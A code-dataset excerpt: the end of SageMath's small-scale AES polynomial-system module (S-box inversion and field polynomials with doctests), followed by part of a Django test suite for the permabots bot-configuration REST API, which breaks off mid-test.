w7**2 + w7*w5 + w7*w3 + w7*x7 + w7*x6 + w7*x4 + w7*x3 + w7*x2 + w6**2 + w6*w5 + w6*w2 + w6*w0 + w6*x7 + w6*x6 + w6*x3 + w6*x2 + w6*x1 + w6*x0 + w5**2 + w5*x7 + w5*x6 \
+ w5*x5 + w5*x4 + w5*x2 + w5*x1 + w4**2 + w4*w3 + w4*w2 + w4*w1 + w4*x6 + w4*x5 + w4*x2 + w4*x1 + w3**2 + w3*w1 + w3*x6 + w3*x5 + w3*x3 + w3*x0 + w2*w1 + w2*x7 \
+ w2*x4 + w2*x2 + w2*x1 + w1*x6 + w1*x5 + w1*x1 + w0*x5,
w7*w5 + w7*w2 + w7*w0 + w7*x5 + w7*x3 + w6**2 + w6*w5 + w6*w2 + w6*w1 + w6*w0 + w6*x7 + w6*x3 + w6*x2 + w6*x0 + w5**2 + w5*w4 + w5*x7 + w5*x6 + w5*x4 + w5*x2 + w5*x0 \
+ w4**2 + w4*w2 + w4*w1 + w4*w0 + w4*x6 + w4*x4 + w4*x3 + w4*x2 + w4*x0 + w3**2 + w3*w2 + w3*x7 + w3*x6 + w3*x4 + w3*x3 + w3*x2 + w3*x0 + w2*x7 + w2*x6 + w2*x4 \
+ w2*x1 + w2*x0 + w1*w0 + w1*x5 + w1*x4 + w0*x1,
w7**2 + w7*w4 + w7*w2 + w7*x6 + w7*x4 + w7*x0 + w6*w4 + w6*w3 + w6*w2 + w6*w1 + w6*x4 + w6*x3 + w6*x1 + w5**2 + w5*w4 + w5*w3 + w5*w2 + w5*w0 + w5*x7 + w5*x5 + w5*x3 \
+ w5*x1 + w5*x0 + w4*w3 + w4*w2 + w4*w1 + w4*x7 + w4*x5 + w4*x4 + w4*x3 + w4*x1 + w4*x0 + w3**2 + w3*x7 + w3*x5 + w3*x4 + w3*x3 + w3*x1 + w2*w0 + w2*x7 + w2*x5 \
+ w2*x2 + w2*x1 + w1*w0 + w1*x6 + w1*x5 + w0*x2])
return l
def _inversion_polynomials_single_sbox(self, x= None, w=None, biaffine_only=None, correct_only=None):
"""
Generate inversion polynomials of a single S-box.
INPUT:
- ``x`` - output variables (default: ``None``)
- ``w`` - input variables (default: ``None``)
- ``biaffine_only`` - only include biaffine polynomials (default: object default)
- ``correct_only`` - only include correct polynomials (default: object default)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: len(sr._inversion_polynomials_single_sbox())
24
sage: len(sr._inversion_polynomials_single_sbox(correct_only=True))
23
sage: len(sr._inversion_polynomials_single_sbox(biaffine_only=False))
40
sage: len(sr._inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
39
"""
e = self.e
if biaffine_only is None:
biaffine_only = self._biaffine_only
if correct_only is None:
correct_only = self._correct_only
if x is None and w is None:
# make sure it prints like in the book.
names = ["w%d" % i for i in reversed(range(e))] + ["x%d"%i for i in reversed(range(e))]
P = PolynomialRing(GF(2), e*2, names, order='lex')
x = Matrix(P, e, 1, P.gens()[e:])
w = Matrix(P, e, 1, P.gens()[:e])
else:
if isinstance(x, (tuple, list)):
P = x[0].parent()
elif is_Matrix(x):
P = x.base_ring()
else:
raise TypeError("x not understood")
if isinstance(x, (tuple, list)):
x = Matrix(P, e, 1, x)
if isinstance(w, (tuple, list)):
w = Matrix(P, e, 1, w)
T = self._mul_matrix(self.k.gen())
o = Matrix(P, e, 1, [0]*(e-1) + [1])
columns = []
for i in reversed(range(e)):
columns.append((T**i * w).list())
Cw = Matrix(P, e, e, columns).transpose()
columns = []
for i in reversed(range(e)):
columns.append((T**i * x).list())
Cx = Matrix(P, e, e, columns).transpose()
S = self._square_matrix()
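        # BES-style relations: with Cw, Cx the multiplication-by-w / -by-x
        # matrices, inversion gives Cw*x = (0,...,0,1)^T (its last component
        # is dropped when correct_only), and the biaffine equations
        # w*x^2 = x and x*w^2 = w give Cw*S*x + x and Cx*S*w + w; the
        # optional non-biaffine relations use S^2.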
l = []
if correct_only:
l.append( (Cw * x + o).list()[:-1] )
else:
l.append( (Cw * x + o).list() )
l.append( (Cw * S *x + x).list() )
l.append( (Cx * S *w + w).list() )
if not biaffine_only:
l.append( ((Cw * S**2 + Cx*S)*x).list() )
l.append( ((Cx * S**2 + Cw*S)*w).list() )
return sum(l, [])
def inversion_polynomials(self, xi, wi, length):
"""
Return polynomials to represent the inversion in the AES S-Box.
INPUT:
- ``xi`` - output variables
- ``wi`` - input variables
- ``length`` - length of both lists
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: xi = sr.vars('x', 1)
sage: wi = sr.vars('w', 1)
sage: sr.inversion_polynomials(xi, wi, len(xi))[:3]
[x100*w100 + x100*w102 + x100*w103 + x100*w107 + x101*w101 + x101*w102 + x101*w106 + x102*w100 + x102*w101 + x102*w105 + x103*w100 + x103*w104 + x104*w103 + x105*w102 + x106*w101 + x107*w100,
x100*w101 + x100*w103 + x100*w104 + x101*w100 + x101*w102 + x101*w103 + x101*w107 + x102*w101 + x102*w102 + x102*w106 + x103*w100 + x103*w101 + x103*w105 + x104*w100 + x104*w104 + x105*w103 + x106*w102 + x107*w101,
x100*w102 + x100*w104 + x100*w105 + x101*w101 + x101*w103 + x101*w104 + x102*w100 + x102*w102 + x102*w103 + x102*w107 + x103*w101 + x103*w102 + x103*w106 + x104*w100 + x104*w101 + x104*w105 + x105*w100 + x105*w104 + x106*w103 + x107*w102]
"""
if is_Matrix(xi):
xi = xi.list()
if is_Matrix(wi):
wi = wi.list()
e = self.e
l = []
for j in range(0, length, e):
l += self.inversion_polynomials_single_sbox(xi[j:j+e], wi[j:j+e])
return l
    def field_polynomials(self, name, i, l=None):
        r"""
Return list of field polynomials for a given round ``i`` and
name ``name``.
INPUT:
- ``name`` - variable name
- ``i`` - round number
- ``l`` - length of variable list (default: ``None`` = r\*c)
EXAMPLES::
sage: sr = mq.SR(3, 1, 1, 8, gf2=True, polybori=False)
sage: sr.field_polynomials('x', 2)
[x200^2 + x200, x201^2 + x201,
x202^2 + x202, x203^2 + x203,
x204^2 + x204, x205^2 + x205,
x206^2 + x206, x207^2 + x207]
::
sage: sr = mq.SR(3, 1, 1, 8, gf2=True, polybori=True)
sage: sr.field_polynomials('x', 2)
[]
"""
r = self._r
c = self._c
e = self._e
n = self._n
if l is None:
l = r*c
if self._polybori:
return []
_vars = self.vars(name, i, l, e)
return [_vars[e*j+i]**2 - _vars[e*j+i] for j in range(l) for i in range(e)]
class SR_gf2_2(SR_gf2):
"""
    This is an example of how to customize the SR constructor.
In this example, we replace the S-Box inversion polynomials by the
polynomials generated by the S-Box class.
"""
def inversion_polynomials_single_sbox(self, x=None, w=None, biaffine_only=None, correct_only=None, groebner=False):
"""
Return inversion polynomials of a single S-Box.
INPUT:
- ``x`` - output variables (default: ``None``)
- ``w`` - input variables (default: ``None``)
- ``biaffine_only`` - ignored (always ``False``)
- ``correct_only`` - ignored (always ``True``)
- ``groebner`` - precompute the Groebner basis for this S-Box (default: ``False``).
EXAMPLES::
sage: from sage.crypto.mq.sr import SR_gf2_2
sage: e = 4
sage: sr = SR_gf2_2(1, 1, 1, e)
sage: P = PolynomialRing(GF(2),['x%d'%i for i in range(e)] + ['w%d'%i for i in range(e)],order='lex')
sage: X,W = P.gens()[:e],P.gens()[e:]
sage: sr.inversion_polynomials_single_sbox(X, W, groebner=True)
[x0 + w0*w1*w2 + w0*w1 + w0*w2 + w0*w3 + w0 + w1 + w2,
x1 + w0*w1*w3 + w0*w3 + w0 + w1*w3 + w1 + w2*w3,
x2 + w0*w2*w3 + w0*w2 + w0 + w1*w2 + w1*w3 + w2*w3,
x3 + w0*w1*w2 + w0 + w1*w2*w3 + w1*w2 + w1*w3 + w1 + w2 + w3]
sage: from sage.crypto.mq.sr import SR_gf2_2
sage: e = 4
sage: sr = SR_gf2_2(1, 1, 1, e)
sage: sr.inversion_polynomials_single_sbox()
[w3*w1 + w3*w0 + w3*x2 + w3*x1 + w3 + w2*w1 + w1 + x3 + x2 + x1,
w3*w2 + w3*w1 + w3*x3 + w2 + w1 + x3,
w3*w2 + w3*w1 + w3*x2 + w3 + w2*x3 + x2 + x1,
w3*w2 + w3*w1 + w3*x3 + w3*x2 + w3*x1 + w3 + w2*x2 + w0 + x3 + x2 + x1 + x0,
w3*w2 + w3*w1 + w3*x1 + w3*x0 + w2*x1 + w0 + x3 + x0,
w3*w2 + w3*w1 + w3*w0 + w3*x2 + w3*x1 + w2*w0 + w2*x0 + w0 + x3 + x2 + x1 + x0,
w3*w2 + w3*x1 + w3 + w2*w0 + w1*w0 + w1 + x3 + x2,
w3*w2 + w3*w1 + w3*x1 + w1*x3 + x3 + x2 + x1,
w3*x3 + w3*x2 + w3*x0 + w3 + w1*x2 + w1 + w0 + x2 + x0,
w3*w2 + w3*w1 + w3*x2 + w3*x1 + w1*x1 + w1 + w0 + x2 + x0,
w3*w2 + w3*w1 + w3*w0 + w3*x3 + w3*x1 + w2*w0 + w1*x0 + x3 + x2,
w3*w2 + w3*w1 + w3*x2 + w3*x1 + w3*x0 + w3 + w1 + w0*x3 + x3 + x2,
w3*w2 + w3*w1 + w3*w0 + w3*x3 + w3 + w2*w0 + w1 + w0*x2 + x3 + x2,
w3*w0 + w3*x2 + w2*w0 + w0*x1 + w0 + x3 + x1 + x0,
w3*w0 + w3*x3 + w3*x0 + w2*w0 + w1 + w0*x0 + w0 + x3 + x2,
w3*w2 + w3 + w1 + x3*x2 + x3 + x1,
w3*w2 + w3*x3 + w1 + x3*x1 + x3 + x2,
w3*w2 + w3*w0 + w3*x3 + w3*x2 + w3*x1 + w0 + x3*x0 + x1 + x0,
w3*w2 + w3*w1 + w3*w0 + w3*x3 + w1 + w0 + x2*x1 + x2 + x0,
w3*w2 + w2*w0 + w1 + x3 + x2*x0,
w3*x3 + w3*x1 + w2*w0 + w1 + x3 + x2 + x1*x0 + x1]
TESTS:
        Note that ``biaffine_only`` and ``correct_only`` are always
        ignored: the former is always treated as ``False`` and the latter
        as ``True``. They are only accepted for compatibility with the
        base class.
sage: from sage.crypto.mq.sr import SR_gf2_2
sage: e = 4
sage: sr = SR_gf2_2(1, 1, 1, e)
sage: l = sr.inversion_polynomials_single_sbox()
sage: l == sr.inversion_polynomials_single_sbox(biaffine_only=True, correct_only=False)
True
"""
e = self.e
if x is None and w is None:
# make sure it prints like in the book.
names = ["w%d" % i for i in reversed(range(e))] + ["x%d"%i for i in reversed(range(e))]
P = PolynomialRing(GF(2), e*2, names, order='lex')
x = P.gens()[e:]
w = P.gens()[:e]
S = self.sbox(inversion_only=True)
F = S.polynomials(w, x, degree=e-2, groebner=groebner)
return F
class AllowZeroInversionsContext:
"""
Temporarily allow zero inversion.
"""
def __init__(self, sr):
"""
EXAMPLES::
sage: from sage.crypto.mq.sr import AllowZeroInversionsContext
sage: sr = mq.SR(1,2,2,4)
sage: with AllowZeroInversionsContext(sr):
....: sr.sub_byte(0)
a^2 + a
"""
self.sr = sr
def __enter__(self):
"""
EXAMPLES::
sage: from sage.crypto.mq.sr import AllowZeroInversionsContext
sage: sr = mq.SR(1,2,2,4)
sage: sr.sub_byte(0)
Traceback (most recent call last):
...
ZeroDivisionError: A zero inversion occurred during an encryption or key schedule.
sage: with AllowZeroInversionsContext(sr):
....: sr.sub_byte(0)
a^2 + a
"""
self.allow_zero_inversions = self.sr._allow_zero_inversions
self.sr._allow_zero_inversions = True
def __exit__(self, typ, value, tb):
"""
EXAMPLES::
sage: from sage.crypto.mq.sr import AllowZeroInversionsContext
sage: sr = mq.SR(1,2,2,4)
sage: with AllowZeroInversionsContext(sr):
....: sr.sub_byte(0)
a^2 + a
sage: sr._allow_zero_inversions
False
"""
self.sr._allow_zero_inversions = self.allow_zero_inversions
def test_consistency(max_n=2, **kwargs):
r"""
Test all combinations of ``r``, ``c``, ``e`` and ``n`` in ``(1,
2)`` for consistency of random encryptions and their polynomial
systems. `\GF{2}` and `\GF{2^e}` systems are tested. This test takes
a while.
INPUT:
- ``max_n`` -- maximal number of rounds to consider (default: 2)
- ``kwargs`` -- are passed to the SR constructor
TESTS:
The following test called with ``max_n`` = 2 requires a LOT of RAM
(much more than 2GB). Since this might cause the doctest to fail
on machines with "only" 2GB of RAM, we test ``max_n`` = 1, which
has a more reasonable memory usage. ::
sage: from sage.crypto.mq.sr import test_consistency
sage: test_consistency(1) # long time (65s on sage.math, 2012)
True
"""
consistent = True
for r in (1, 2, 4):
for c in (1, 2, 4):
for e in (4, 8):
for n in range(1, max_n+1):
for gf2 in (True, False):
zero_division = True
while zero_division:
sr = SR(n, r, c, e, gf2=gf2, **kwargs)
try:
F, s = sr.polynomial_system()
F = F.subs(s)
consistent &= (F.groebner_basis()[0] != 1)
if not consistent:
print(str(sr) + " is not consistent")
zero_division = False
except ZeroDivisionError:
pass
return consistent
| 36.37342 | 251 | 0.465806 |
cd70deed1e1d6e6d9b7218557c251e178cd34575 | 22,156 | py | Python | tests/api/test_bot.py | eafanasev/permabots | 24de0376e8c482800f4214c021c133d81b9de69f | ["BSD-3-Clause"] | 81 | 2016-05-18T02:34:10.000Z | 2021-08-28T17:25:13.000Z | tests/api/test_bot.py | eafanasev/permabots | 24de0376e8c482800f4214c021c133d81b9de69f | ["BSD-3-Clause"] | 15 | 2016-05-27T08:51:46.000Z | 2021-03-19T21:42:21.000Z | tests/api/test_bot.py | eafanasev/permabots | 24de0376e8c482800f4214c021c133d81b9de69f | ["BSD-3-Clause"] | 34 | 2016-05-29T14:37:01.000Z | 2022-03-24T17:16:53.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from permabots.models import Bot, TelegramBot, KikBot, MessengerBot
from rest_framework import status
from permabots.views import BotDetail, TelegramBotDetail, KikBotDetail, MessengerBotDetail
import json
from tests.api.base import BaseTestAPI
from unittest import skip
class TestBotAPI(BaseTestAPI):
def assertBot(self, id, created_at, updated_at, name, telegram_bot_token=None, kik_bot_api_key=None, messenger_bot_token=None, bot=None):
if not bot:
bot = self.bot
self.assertEqual(bot.name, name)
if bot.telegram_bot:
self.assertEqual(telegram_bot_token, bot.telegram_bot.token)
if bot.kik_bot:
self.assertEqual(kik_bot_api_key, bot.kik_bot.api_key)
if bot.messenger_bot:
self.assertEqual(messenger_bot_token, bot.messenger_bot.token)
self.assertPermabotsModel(id, created_at, updated_at, bot)
def _bot_list_url(self):
return '%s/bots/' % self.api
def _bot_detail_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/' % (self.api, bot_pk)
def test_get_bots_ok(self):
data = self._test_get_list_ok(self._bot_list_url())
self.assertBot(data[0]['id'], data[0]['created_at'], data[0]['updated_at'], data[0]['name'],
data[0]['telegram_bot']['token'], data[0]['kik_bot']['api_key'], data[0]['messenger_bot']['token'], None)
def test_get_bots_not_auth(self):
self._test_get_list_not_auth(self._bot_list_url())
def test_post_bots_ok(self):
data = self._test_post_list_ok(self._bot_list_url(), Bot, {'name': 'new_name'})
new_bot = Bot.objects.all()[0]
self.assertEqual(new_bot.name, 'new_name')
self.assertBot(data['id'], data['created_at'], data['updated_at'], data['name'], None, None, None, new_bot)
def test_post_bots_not_auth(self):
self._test_post_list_not_auth(self._bot_list_url(), {'name': 'new_name'})
def test_get_bot_ok(self):
data = self._test_get_detail_ok(self._bot_detail_url())
self.assertBot(data['id'], data['created_at'], data['updated_at'], data['name'], data['telegram_bot']['token'], data['kik_bot']['api_key'],
data['messenger_bot']['token'])
def test_get_bot_not_auth(self):
self._test_get_detail_not_auth(self._bot_detail_url())
def test_get_bot_not_found(self):
self._test_get_detail_not_found(self._bot_detail_url(self.unlikely_id))
def test_put_bot_ok(self):
data = self._test_put_detail_ok(self._bot_detail_url(), {'name': 'new_name'}, BotDetail, self.bot.pk)
updated = Bot.objects.get(pk=self.bot.pk)
self.assertEqual(updated.name, 'new_name')
self.assertBot(data['id'], data['created_at'], data['updated_at'], data['name'], data['telegram_bot']['token'],
data['kik_bot']['api_key'], data['messenger_bot']['token'], updated)
def test_put_bot_not_auth(self):
self._test_put_detail_not_auth(self._bot_detail_url(), {'name': 'new_name'}, BotDetail, self.bot.pk)
def test_put_bot_not_found(self):
self._test_put_detail_not_found(self._bot_detail_url(self.unlikely_id), {'name': 'new_name'}, BotDetail, self.unlikely_id)
def test_delete_bot_ok(self):
self._test_delete_detail_ok(self._bot_detail_url(), BotDetail, self.bot.pk)
self.assertEqual(Bot.objects.count(), 0)
def test_delete_bot_not_auth(self):
self._test_delete_detail_not_auth(self._bot_detail_url(), BotDetail, self.bot.pk)
def test_delete_bot_not_found(self):
self._test_delete_detail_not_found(self._bot_detail_url(self.unlikely_id), BotDetail, self.unlikely_id)
class TestTelegramBotAPI(BaseTestAPI):
def assertTelegramBot(self, id, created_at, updated_at, token, enabled, username, first_name, last_name, telegram_bot=None):
if not telegram_bot:
telegram_bot = self.bot.telegram_bot
self.assertEqual(telegram_bot.token, token)
self.assertEqual(telegram_bot.enabled, enabled)
self.assertEqual(telegram_bot.user_api.username, username)
self.assertEqual(telegram_bot.user_api.first_name, first_name)
self.assertEqual(telegram_bot.user_api.last_name, last_name)
self.assertPermabotsModel(id, created_at, updated_at, telegram_bot)
def _telegram_bot_list_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/telegram/' % (self.api, bot_pk)
def _telegram_bot_detail_url(self, bot_pk=None, telegram_bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
if not telegram_bot_pk:
telegram_bot_pk = self.bot.telegram_bot.pk
return '%s/bots/%s/telegram/%s/' % (self.api, bot_pk, telegram_bot_pk)
def test_get_telegram_bots_ok(self):
data = self._test_get_list_ok(self._telegram_bot_list_url())
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], data['info']['username'],
data['info']['first_name'], data['info']['last_name'], None)
def test_get_telegram_bots_not_auth(self):
self._test_get_list_not_auth(self._telegram_bot_list_url())
def test_telegram_post_bots_ok(self):
data = self._test_post_list_ok(self._telegram_bot_list_url(), TelegramBot, {'token': self.mytoken, 'enabled': 'True'})
new_bot = TelegramBot.objects.get(token=self.mytoken)
self.assertEqual(new_bot.token, self.mytoken)
self.assertTrue(new_bot.enabled)
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'],
data['info']['username'], data['info']['first_name'], data['info']['last_name'], new_bot)
def test_telegram_post_bots_with_no_enabled_field(self):
data = self._test_post_list_ok(self._telegram_bot_list_url(), TelegramBot, {'token': self.mytoken})
new_bot = TelegramBot.objects.get(token=self.mytoken)
self.assertEqual(new_bot.token, self.mytoken)
self.assertTrue(new_bot.enabled)
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'],
data['info']['username'], data['info']['first_name'], data['info']['last_name'], new_bot)
def test_post_telegram_bots_token_not_valid(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._telegram_bot_list_url(),
data=json.dumps({"token": 'invalidtoken', "enabled": True}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('not a valid token', response.data['token'][0])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_telegram_bots_token_not_exists_in_telegram(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._telegram_bot_list_url(),
data=json.dumps({"token": self.mytoken + 'a', "enabled": True}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Telegram Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_telegram_bots_not_auth(self):
self._test_post_list_not_auth(self._telegram_bot_list_url(), {'token': self.mytoken, 'enabled': 'True'})
def test_get_telegram_bot_ok(self):
data = self._test_get_detail_ok(self._telegram_bot_detail_url())
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], data['info']['username'],
data['info']['first_name'], data['info']['last_name'])
def test_get_telegram_bot_not_auth(self):
self._test_get_detail_not_auth(self._telegram_bot_detail_url())
def test_get_telegram_bot_not_found(self):
self._test_get_detail_not_found(self._telegram_bot_detail_url(telegram_bot_pk=self.unlikely_id))
def test_put_telegram_bot_ok(self):
data = self._test_put_detail_ok(self._telegram_bot_detail_url(), {'enabled': 'False'}, TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
updated = TelegramBot.objects.get(pk=self.bot.telegram_bot.pk)
self.assertFalse(updated.enabled)
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'],
data['info']['username'], data['info']['first_name'], data['info']['last_name'], updated)
def test_put_telegram_bot_not_auth(self):
self._test_put_detail_not_auth(self._telegram_bot_detail_url(),
{'token': self.mytoken, 'enabled': 'False'}, TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
def test_put_telegram_bot_not_found(self):
self._test_put_detail_not_found(self._telegram_bot_detail_url(telegram_bot_pk=self.unlikely_id),
{'token': self.mytoken, 'enabled': 'False'}, TelegramBotDetail, self.bot.pk, self.unlikely_id)
def test_delete_telegram_bot_ok(self):
self._test_delete_detail_ok(self._telegram_bot_detail_url(), TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
self.assertEqual(TelegramBot.objects.count(), 0)
def test_delete_telegram_bot_not_auth(self):
self._test_delete_detail_not_auth(self._telegram_bot_detail_url(), TelegramBotDetail, self.bot.pk, self.bot.telegram_bot.pk)
def test_delete_telegram_bot_not_found(self):
self._test_delete_detail_not_found(self._telegram_bot_detail_url(telegram_bot_pk=self.unlikely_id), TelegramBotDetail, self.bot.pk, self.unlikely_id)
class TestKikBotAPI(BaseTestAPI):
def assertKikBot(self, id, created_at, updated_at, api_key, enabled, username, kik_bot=None):
if not kik_bot:
kik_bot = self.bot.kik_bot
self.assertEqual(kik_bot.api_key, api_key)
self.assertEqual(kik_bot.enabled, enabled)
self.assertEqual(kik_bot.username, username)
self.assertPermabotsModel(id, created_at, updated_at, kik_bot)
def _kik_bot_list_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/kik/' % (self.api, bot_pk)
def _kik_bot_detail_url(self, bot_pk=None, kik_bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
if not kik_bot_pk:
kik_bot_pk = self.bot.kik_bot.pk
return '%s/bots/%s/kik/%s/' % (self.api, bot_pk, kik_bot_pk)
def test_get_kik_bots_ok(self):
data = self._test_get_list_ok(self._kik_bot_list_url())
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'], data['username'], None)
def test_get_kik_bots_not_auth(self):
self._test_get_list_not_auth(self._kik_bot_list_url())
def test_kik_post_bots_ok(self):
data = self._test_post_list_ok(self._kik_bot_list_url(), KikBot, {'api_key': self.my_api_key, 'username': self.my_username, 'enabled': 'True'})
new_bot = KikBot.objects.get(api_key=self.my_api_key, username=self.my_username)
self.assertEqual(new_bot.api_key, self.my_api_key)
self.assertEqual(new_bot.username, self.my_username)
self.assertTrue(new_bot.enabled)
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'],
data['username'], new_bot)
def test_kik_post_bots_ok_with_no_enabled_field(self):
data = self._test_post_list_ok(self._kik_bot_list_url(), KikBot, {'api_key': self.my_api_key, 'username': self.my_username})
new_bot = KikBot.objects.get(api_key=self.my_api_key, username=self.my_username)
self.assertEqual(new_bot.api_key, self.my_api_key)
self.assertEqual(new_bot.username, self.my_username)
self.assertTrue(new_bot.enabled)
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'],
data['username'], new_bot)
def test_post_kik_bots_api_not_exists_in_kik(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._kik_bot_list_url(),
data=json.dumps({"api_key": self.my_api_key + 'a', "enabled": True, 'username': self.my_username}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Kik Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_kik_bots_user_not_exists_in_kik(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._kik_bot_list_url(),
data=json.dumps({"api_key": self.my_api_key, "enabled": True, 'username': self.my_username + 'o'}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Kik Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_kik_bots_not_auth(self):
self._test_post_list_not_auth(self._kik_bot_list_url(), {'api_key': self.my_api_key, 'enabled': 'True', 'username': self.my_username})
def test_get_kik_bot_ok(self):
data = self._test_get_detail_ok(self._kik_bot_detail_url())
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'], data['username'],)
def test_get_kik_bot_not_auth(self):
self._test_get_detail_not_auth(self._kik_bot_detail_url())
def test_get_kik_bot_not_found(self):
self._test_get_detail_not_found(self._kik_bot_detail_url(kik_bot_pk=self.unlikely_id))
def test_put_kik_bot_ok(self):
data = self._test_put_detail_ok(self._kik_bot_detail_url(), {'enabled': 'False'}, KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
updated = KikBot.objects.get(pk=self.bot.kik_bot.pk)
self.assertFalse(updated.enabled)
self.assertKikBot(data['id'], data['created_at'], data['updated_at'], data['api_key'], data['enabled'],
data['username'], updated)
def test_put_kik_bot_not_auth(self):
self._test_put_detail_not_auth(self._kik_bot_detail_url(),
{'api_key': self.my_api_key, 'username': self.my_username, 'enabled': 'False'},
KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
def test_put_kik_bot_not_found(self):
self._test_put_detail_not_found(self._kik_bot_detail_url(kik_bot_pk=self.unlikely_id),
{'api_key': self.my_api_key, 'username': self.my_username, 'enabled': 'False'},
KikBotDetail, self.bot.pk, self.unlikely_id)
def test_delete_kik_bot_ok(self):
self._test_delete_detail_ok(self._kik_bot_detail_url(), KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
self.assertEqual(KikBot.objects.count(), 0)
def test_delete_kik_bot_not_auth(self):
self._test_delete_detail_not_auth(self._kik_bot_detail_url(), KikBotDetail, self.bot.pk, self.bot.kik_bot.pk)
def test_delete_kik_bot_not_found(self):
self._test_delete_detail_not_found(self._kik_bot_detail_url(kik_bot_pk=self.unlikely_id), KikBotDetail, self.bot.pk, self.unlikely_id)
class TestMessengerBotAPI(BaseTestAPI):
def assertMessengerBot(self, id, created_at, updated_at, token, enabled, messenger_bot=None):
if not messenger_bot:
messenger_bot = self.bot.messenger_bot
self.assertEqual(messenger_bot.token, token)
self.assertEqual(messenger_bot.enabled, enabled)
self.assertPermabotsModel(id, created_at, updated_at, messenger_bot)
def _messenger_bot_list_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/messenger/' % (self.api, bot_pk)
def _messenger_bot_detail_url(self, bot_pk=None, messenger_bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
if not messenger_bot_pk:
messenger_bot_pk = self.bot.messenger_bot.pk
return '%s/bots/%s/messenger/%s/' % (self.api, bot_pk, messenger_bot_pk)
def test_get_messenger_bots_ok(self):
data = self._test_get_list_ok(self._messenger_bot_list_url())
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], None)
def test_get_messenger_bots_not_auth(self):
self._test_get_list_not_auth(self._messenger_bot_list_url())
def test_messenger_post_bots_ok(self):
data = self._test_post_list_ok(self._messenger_bot_list_url(), MessengerBot, {'token': self.my_messenger_token, 'enabled': 'True'})
new_bot = MessengerBot.objects.get(token=self.my_messenger_token)
self.assertEqual(new_bot.token, self.my_messenger_token)
self.assertTrue(new_bot.enabled)
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], new_bot)
def test_messenger_post_bots_ok_with_no_enabled_field(self):
data = self._test_post_list_ok(self._messenger_bot_list_url(), MessengerBot, {'token': self.my_messenger_token})
new_bot = MessengerBot.objects.get(token=self.my_messenger_token)
self.assertEqual(new_bot.token, self.my_messenger_token)
self.assertTrue(new_bot.enabled)
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], new_bot)
@skip("wait for real token")
def test_post_messenger_bots_token_not_exists_in_messenger(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._messenger_bot_list_url(),
data=json.dumps({"token": self.my_messenger_token + 'a', "enabled": True}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('Messenger Error', response.data['error'])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_messenger_bots_not_auth(self):
self._test_post_list_not_auth(self._messenger_bot_list_url(), {'token': self.my_messenger_token, 'enabled': 'True'})
def test_get_messenger_bot_ok(self):
data = self._test_get_detail_ok(self._messenger_bot_detail_url())
self.assertMessengerBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'])
def test_get_messenger_bot_not_auth(self):
self._test_get_detail_not_auth(self._messenger_bot_detail_url())
def test_get_messenger_bot_not_found(self):
self._test_get_detail_not_found(self._messenger_bot_detail_url(messenger_bot_pk=self.unlikely_id))
def test_put_messenger_bot_ok(self):
data = self._test_put_detail_ok(self._messenger_bot_detail_url(), {'enabled': 'False'}, MessengerBotDetail, self.bot.pk, self.bot.messenger_bot.pk)
updated = MessengerBot.objects.get(pk=self.bot.messenger_bot.pk)
